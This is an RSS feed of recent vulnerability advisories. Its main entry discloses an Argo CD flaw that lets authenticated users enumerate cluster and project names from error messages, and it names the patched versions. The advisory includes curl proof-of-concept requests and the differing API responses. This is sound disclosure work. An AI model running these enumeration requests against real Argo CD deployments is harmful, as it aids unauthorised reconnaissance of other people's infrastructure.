<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 22:43:18 +0000</lastBuildDate>
    <item>
      <title>bdu:2024-05985</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2024-05985</link>
      <description>bdu:2024-05985</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2024-05985</guid>
    </item>
    <item>
      <title>EUVD-2026-161076</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-161076</link>
      <description>EUVD-2026-161076</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-161076</guid>
    </item>
    <item>
      <title>fkie_cve-2024-36106</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-36106</link>
      <description>&lt;p&gt;Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It’s possible for authenticated users to enumerate clusters by name by inspecting error messages. It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It’s possible for authenticated users to enumerate clusters by name by inspecting error messages. It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-36106</guid>
    </item>
    <item>
      <title>GHSA-3cqf-953p-h5cp — Argo-cd authenticated users can enumerate clusters by name</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-3cqf-953p-h5cp</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/argoproj/argo-cd&lt;/p&gt;
&lt;p&gt;### Impact
It’s possible for authenticated users to enumerate clusters by name by inspecting error messages:&lt;/p&gt;
&lt;p&gt;```
$ curl -k &amp;#39;https://localhost:8080/api/v1/clusters/in-cluster?id.type=name&amp;#39; -H &amp;#34;Authorization: 
Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied: clusters, get, , sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied: clusters, get, , sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;}⏎                                 
                                   
$ curl -k &amp;#39;https://localhost:8080/api/v1/clusters/does-not-exist?id.type=name&amp;#39; -H &amp;#34;Authorizati
on: Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied&amp;#34;}
```&lt;/p&gt;
&lt;p&gt;It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters.
```
curl -k &amp;#39;https://localhost:8080/api/v1/clusters/in-cluster-project?id.type=name&amp;#39; -H &amp;#34;Authorization: Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied: clusters, get, default/, sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied: clusters, get, default/, sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;}&lt;/p&gt;
&lt;p&gt;curl -k &amp;#39;https://localhost:8080/api/v1/clusters/does-not-exist?id.type=name&amp;#39; -H &amp;#34;Authorization: Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied&amp;#34;}
```&lt;/p&gt;
&lt;p&gt;### Patches
A patch for this vulnerability has been released in the following Argo CD versions:&lt;/p&gt;
&lt;p&gt;v2.11.3
v2.10.12
v2.9.17&lt;/p&gt;
&lt;p&gt;### For more information
If you have any questions or comments about this advisory:&lt;/p&gt;
&lt;p&gt;Open…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/argoproj/argo-cd&lt;/p&gt;
&lt;p&gt;### Impact
It’s possible for authenticated users to enumerate clusters by name by inspecting error messages:&lt;/p&gt;
&lt;p&gt;```
$ curl -k &amp;#39;https://localhost:8080/api/v1/clusters/in-cluster?id.type=name&amp;#39; -H &amp;#34;Authorization: 
Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied: clusters, get, , sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied: clusters, get, , sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;}⏎                                 
                                   
$ curl -k &amp;#39;https://localhost:8080/api/v1/clusters/does-not-exist?id.type=name&amp;#39; -H &amp;#34;Authorizati
on: Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied&amp;#34;}
```&lt;/p&gt;
&lt;p&gt;It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters.
```
curl -k &amp;#39;https://localhost:8080/api/v1/clusters/in-cluster-project?id.type=name&amp;#39; -H &amp;#34;Authorization: Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied: clusters, get, default/, sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied: clusters, get, default/, sub: alice, iat: 2022-11-04T20:25:44Z&amp;#34;}&lt;/p&gt;
&lt;p&gt;curl -k &amp;#39;https://localhost:8080/api/v1/clusters/does-not-exist?id.type=name&amp;#39; -H &amp;#34;Authorization: Bearer $token&amp;#34;
{&amp;#34;error&amp;#34;:&amp;#34;permission denied&amp;#34;,&amp;#34;code&amp;#34;:7,&amp;#34;message&amp;#34;:&amp;#34;permission denied&amp;#34;}
```&lt;/p&gt;
&lt;p&gt;### Patches
A patch for this vulnerability has been released in the following Argo CD versions:&lt;/p&gt;
&lt;p&gt;v2.11.3
v2.10.12
v2.9.17&lt;/p&gt;
&lt;p&gt;### For more information
If you have any questions or comments about this advisory:&lt;/p&gt;
&lt;p&gt;Open…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-3cqf-953p-h5cp</guid>
    </item>
  </channel>
</rss>
